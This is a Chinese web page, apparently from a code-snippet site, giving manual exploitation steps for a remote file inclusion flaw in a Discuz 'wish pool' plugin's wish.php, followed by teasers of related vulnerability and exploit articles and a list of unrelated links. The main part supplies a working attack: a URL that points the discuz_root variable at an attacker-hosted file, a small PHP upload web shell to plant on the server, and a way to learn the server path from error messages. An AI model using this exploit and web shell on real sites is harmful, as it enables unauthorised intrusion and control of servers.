discuz许愿池插件远程包含漏洞
许愿池插件的wish.php文件出的问题:
require $discuz_root.'./include/discuzcode.func.php';
手工利用方法:
远程包含漏洞,变量discuz_root过滤不严,利用方法:
http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt?
不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号。
这里xxxx.txt用CN.Tink的那个小马写个shell进去:
<?copy($_FILES[MyFile][tmp_name],"C:\Inetpub\vhosts\baidu.com\bbs\guizai.php");?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST">
<input NAME="MyFile" TYPE="file">
<input VALUE=" 提交 " TYPE="submit">
</form>
网站物理路径可以通过提交http://url/wish.php?discuz_root=http://www.huaidan.org/xxxx.txt ,看错误提示信息,然后修改xxxx.txt中的路径即可。 guizai.php就是你上传的shell的名字。
相关推荐
-
discuz许愿池插件远程包含漏洞
许愿池插件的wish.php文件出的问题: require $discuz_root.'./include/discuzcode.func.php'; 手工利用方法: 远程包含漏洞,变量discuz_root过滤不严,利用方法: http://url/wish.php?discuz_root=http://www.neeao.com/xxxx.txt? 不一定非要txt后缀,可以改为任意后缀,后面一定要记得加问号. 这里xxxx.txt用CN.Tink的那个小马写个shell进去: <?copy
-
DedeCMS 5.7 sp1远程文件包含漏洞(CVE-2015-4553)
一.漏洞描述 该漏洞在/install/index.php(index.php.bak)文件中,漏洞起因是$$符号使用不当,导致变量覆盖,以至于最后引起远程文件包含漏洞. 二.漏洞影响版本 DeDeCMS < 5.7-sp1,包括5.7 sp1版本 三.漏洞环境搭建 1.下载DeDeCMS V5.7 SP1,然后放到phpstudy环境下的www目录下,然后浏览器访http://192.168.10.171/dedecms/uploads/install/index.php 2.点击我已阅读并继
-
详解PHP渗透测试文件包含漏洞与利用
目录 什么是文件包含漏洞 文件包含漏洞的分类 本地文件包含 漏洞&利用 利用条件(以PHP为例) 直接访问文件 利用协议读取源代码 截断%00 长度截断 PHP的伪协议 file:// php:// data:// phar:// 远程文件包含 漏洞利用 远程包含webshell 代码审计 修复建议 什么是文件包含漏洞 文件包含,在网站开发人员开发网站时,会将经常重复的代码写道一个单独的文件中,在别的文件中可以使用文件包含的函数来引用单独的文件.目前很多语言都支持文件包含,例如php(inchu
-
php5系列的apache远程执行漏洞攻击脚本
php5.x系列/apache远程执行漏洞及攻击脚本以下为相关代码,请文明使用... 复制代码 代码如下: /* Apache Magica by Kingcope *//* gcc apache-magika.c -o apache-magika -lssl *//* This is a code execution bug in the combination of Apache and PHP.On debian and Ubuntu the vulnerability is presen
-
IDEA使用Docker插件远程部署项目到云服务器的方法步骤
1. 打开2375端口 编辑docker.service vim /lib/systemd/system/docker.service 在 ExecStart 后添加配置 -H tcp://0.0.0.0:2375 -H unix://var/run/docker.sock 重启docker网络和docker systemctl daemon-reload systemctl restart-docker Centos7 开放端口 firewall-cmd --zone=public --add
-
Tomcat使用线程池处理远程并发请求的方法
通过了解学习tomcat如何处理并发请求,了解到线程池,锁,队列,unsafe类,下面的主要代码来自 java-jre: sun.misc.Unsafe java.util.concurrent.ThreadPoolExecutor java.util.concurrent.ThreadPoolExecutor.Worker java.util.concurrent.locks.AbstractQueuedSynchronizer java.util.concurrent.locks.Abstr
-
Vscode的SSH插件远程连接Linux的实现步骤
最近在B站上看到Vscode可以远程连接Linux, 不仅有与linux一模一样的终端,而且写代码很舒服,所以尝试了一下远程连接. 首先,要先在Vscode中安装 “Remote-SSH”扩展(插件), 安装好之后,在工具栏会出现这个图标: 之后点击“+”,添加远程主机: 点击之后,会弹出一个框,要我们输入待连接的远程主机的用户名和IP地址:按格式输入,输入之后,回车键确认 如何查看Linux的IP地址: 方法一:进入Linux的设置(Setting) 方法二:在linux的终端输入一条指令 $
-
关于CVE-2020-1983:Tomcat 文件包含漏洞的问题
目录 一.靶场环境 1.漏洞:任意文件包含 2.影响版本 二.搭建环境 1.启动环境 2.访问 3.漏洞利用 4.修复建议 起序:漏扫完看报告的时候发现的,复现学习一下. 一.靶场环境 使用的是 github 上的 vulhub 环境.Tomcat 版本为 9.0.30. 1.漏洞:任意文件包含 攻击者可利用该漏洞读取或包含 Tomcat 上所有 webapp 目录下的任意文件,如:webapp 配置文件.源代码等. 2.影响版本 Apache Tomcat 9.x < 9.0.31 Apach
-
Java动态线程池插件dynamic-tp集成zookeeper
目录 前言 配置刷新 Zookeeper配置中心接入扩展实现 总结 前言 dynamic-tp是一个轻量级的动态线程池插件,它是一个基于配置中心的动态线程池,线程池的参数可以通过配置中心配置进行动态的修改,在配置中心的支持上最开始的时候支持Nacos和Apollo,由于笔者公司用的配置中心是Zookeeper,所以就想着扩展支持Zookeeper,在了解源码支持发现dynamic-tp的扩展能力做的很好,提供了扩展接口,只要我开发对应的配置中心模块即可,最终笔者实现了Zookeeper的支持并贡
-
PHP 网络开发详解之远程文件包含漏洞
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能. 复制代码 代码如下: <?php $file_name = $_GET["filename"]; //获得当前文件名 include("$file_name "); //包含文件 //一些其他操作 ?> 这时,通过在地址栏上指定不同的文件名就可以实现包含不同文件并执行的功能.例如,通过在浏览器上访问http://localhost/test.php?filename=myinc
随机推荐
- asp.net下 jquery jason 高效传输数据
- VBS教程:属性-Line 属性
- ASP.NET2.0数据库入门之SqlDataSource
- 在Python的Django框架中simple-todo工具的简单使用
- 详谈C++中虚基类在派生类中的内存布局
- Java依赖倒转原则_动力节点Java学院整理
- Java操作redis实现增删查改功能的方法示例
- SQL Server数据库按百分比查询出表中的记录数
- jQuery基于ajax实现星星评论代码
- JavaScript 浮动定位提示效果实现代码第1/2页
- javascript 定义初始化数组函数
- ubuntu 编译安装php 5.3.3+memcache的方法
- PHP中变量引用与变量销毁机制分析
- bootstrap select下拉搜索插件使用方法详解
- Android CrashHandler编写自己的异常捕获的方法
- Android编程设计模式之访问者模式详解
- php合并数组并保留键值的实现方法
- Java加速读取复制超大文件
- android studio节省C盘空间的配置方法
- layui实现鼠标移动到单元格上显示数据的方法